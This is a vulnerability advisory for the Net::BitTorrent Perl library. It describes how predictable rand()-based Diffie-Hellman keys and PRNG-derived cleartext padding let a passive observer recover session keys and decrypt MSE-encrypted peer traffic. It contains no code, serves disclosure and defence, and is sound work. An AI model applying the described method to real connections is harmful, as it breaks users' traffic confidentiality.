Impact
Net::BitTorrent generates its MSE Diffie‑Hellman private key from Perl's non‑cryptographic rand(), a predictably seeded drand48‑style generator. Because the handshake includes cleartext padding derived from the same PRNG, an observer can recover the PRNG state, reconstruct the private key and compute the shared secret from the peer’s public key. The derived RC4 keys and the encrypted channel can therefore be decrypted, giving an attacker full confidentiality of the MSE protected traffic. The CWE identifiers CWE‑330 (Use of Non‑cryptographic Random Number Generator) and CWE‑338 (Insufficient Entropy) describe this weakness.
Affected Systems
SankO's Net::BitTorrent library, all versions through 2.0.1 for Perl, when used to encrypt peer connections with MSE. Any installation of these affected versions is vulnerable to passive traffic analysis.
Risk and Exploitability
The CVSS score of 5.9 indicates medium severity. EPSS data is not available and the vulnerability is not listed in CISA KEV. The attack requires only passive observation of the MSE handshake and no privileged access, and it directly compromises the confidentiality of all encrypted traffic.
OpenCVE Enrichment